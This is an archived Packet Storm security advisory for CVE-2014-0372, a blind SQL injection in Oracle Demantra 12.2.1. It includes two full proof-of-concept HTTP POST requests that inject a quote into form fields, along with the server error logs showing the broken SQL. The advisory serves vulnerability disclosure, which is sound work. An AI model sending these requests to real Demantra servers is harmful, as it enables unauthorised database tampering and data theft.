Lucene search

K
packetstormOliver GruskovnjakPACKETSTORM:125487
HistoryMar 02, 2014 - 12:00 a.m.

Oracle Demantra 12.2.1 SQL Injection

2014-03-0200:00:00
Oliver Gruskovnjak
packetstormsecurity.com
36

0.134 Low

EPSS

Percentile

95.0%

`Vulnerability title: SQL Injection in Oracle Demantra  
CVE: CVE-2014-0372  
Vendor: Oracle  
Product: Demantra  
Affected version: 12.2.1  
Fixed version: 12.2.3  
Reported by: Oliver Gruskovnjak  
  
Details:  
  
The Oracle Demantra application is vulnerable to SQL injection.  
  
An attacker with access to the vulnerable pages could manipulate the  
queries being sent to the database, potentially enabling them to extract  
sensitive information or modify content within the application.  
  
In this particular instance, exploitation was more difficult as the  
results of the attack had to inferred based on the pages returned, often  
referred to as Β“blindΒ” SQL Injection.  
  
  
Exploit:  
  
POST /demantra/portal/editExecDefinition.jsp HTTP/1.1  
Host: www.target.com:8080  
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:22.0) Gecko/20100101 Firefox/22.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate  
DNT: 1  
Referer: http://www.target.com:8080/demantra/portal/editExecDefinition.jsp?menuBarId=2&menuGroupId=4&menuItemId=10&tkn=919872817530076  
Cookie: ORA_EBS_DEMANTRA_LOGIN_LANGUAGE=US; JSESSIONID=6741133838FDEC5D65258F72A4E4EB87  
Connection: keep-alive  
Content-Type: application/x-www-form-urlencoded  
Content-Length: 388  
  
done=done&menuBarId=2&menuGroupId=4&tkn=919872817530076&menuItemId=10&menuAction=edit&order=0&command=http%3A%2F%2Fwww.oracle.com%2Fdemantra%2Findex.htm'&title=Demantra+Web+Site&description=Demantra+Web+Site&type=3&fileInput=&linkInput=http%3A%2F%2Fwww.oracle.com%2Fdemantra%2Findex.htm%27&desktopCommand=%23DEMANTRA.MODELER%23&param=  
  
Related Error Log Entry:  
  
2013-08-01 16:42:11,039 PDT [http-8080-6] ERROR appserver.sql: ODPM-70173: Error SQL:  
[error occurred during batching: ORA-01756: quoted string not properly terminated]  
UPDATE EXEC_DEFINITION SET MENU_ITEM_ID = 10,EXEC_ID = 5,EXEC_PATH = '',EXEC_NAME = 'http://www.oracle.com/demantra/index.htm'',PARAMETERS = '',EXEC_TYPE = 3  
WHERE EXEC_ID = 5  
2013-08-01 16:42:11,039 PDT [http-8080-6] ERROR appserver.error:   
com.demantra.applicationServer.appServerExceptions.FailedToExcuteBatch: java.sql.BatchUpdateException: error occurred during batching: ORA-01756: quoted string not properly terminated at com.demantra.applicationServer.services.DBServicesCommon.excuteBatch(DBServicesCommon.java:1446)  
  
Sample Request #2:  
  
POST /demantra/portal/saveProgramGroups.jsp HTTP/1.1  
Host: www.target.com:8080  
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:22.0) Gecko/20100101 Firefox/22.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate  
DNT: 1  
Referer: http://www.target.com:8080/demantra/portal/programGroupDefinition.jsp  
Cookie: ORA_EBS_DEMANTRA_LOGIN_LANGUAGE=US; JSESSIONID=AC4D868CFC8F2B0CF06B62426A9F8CF7  
Connection: keep-alive  
Content-Type: application/x-www-form-urlencoded  
Content-Length: 170  
  
selectedPGItems=SEL_TYPE_1_MODULE_5_ID_267%2CSEL_TYPE_1_MODULE_5_ID_267%2C&tkn=548771231479710&PGName=aaa'&PGDescription=aaaa&objectFilter=1&SEL_TYPE_1_MODULE_5_ID_267=on  
  
Related Error Log Entry:  
  
... 39 more  
  
2013-08-01 16:57:40,287 PDT [http-8080-9] ERROR appserver.sql: ODPM-70173: Error SQL:  
[error occurred during batching: ORA-00933: SQL command not properly ended]  
UPDATE PROGRAM_GROUPS SET NAME = 'aaa'',DESCRIPTION = 'aaaa' WHERE PROGRAM_GROUP_ID = 9  
2013-08-01 16:57:40,287 PDT [http-8080-9] ERROR appserver.error:   
com.demantra.applicationServer.appServerExceptions.FailedToExcuteBatch: java.sql.BatchUpdateException: error occurred during batching: ORA-00933: SQL command not properly ended at com.demantra.applicationServer.services.DBServicesCommon.excuteBatch(DBServicesCommon.java:1446)  
  
  
  
Further details at:  
https://www.portcullis-security.com/security-research-and-downloads/security-advisories/cve-2014-0372/  
  
  
Copyright:  
Copyright (c) Portcullis Computer Security Limited 2014, All rights  
reserved worldwide. Permission is hereby granted for the electronic  
redistribution of this information. It is not to be edited or altered in  
any way without the express written consent of Portcullis Computer  
Security Limited.  
  
Disclaimer:  
The information herein contained may change without notice. Use of this  
information constitutes acceptance for use in an AS IS condition. There  
are NO warranties, implied or otherwise, with regard to this information  
or its use. Any use of this information is at the user's risk. In no  
event shall the author/distributor (Portcullis Computer Security  
Limited) be held liable for any damages whatsoever arising out of or in  
connection with the use or spread of this information.  
  
  
`

0.134 Low

EPSS

Percentile

95.0%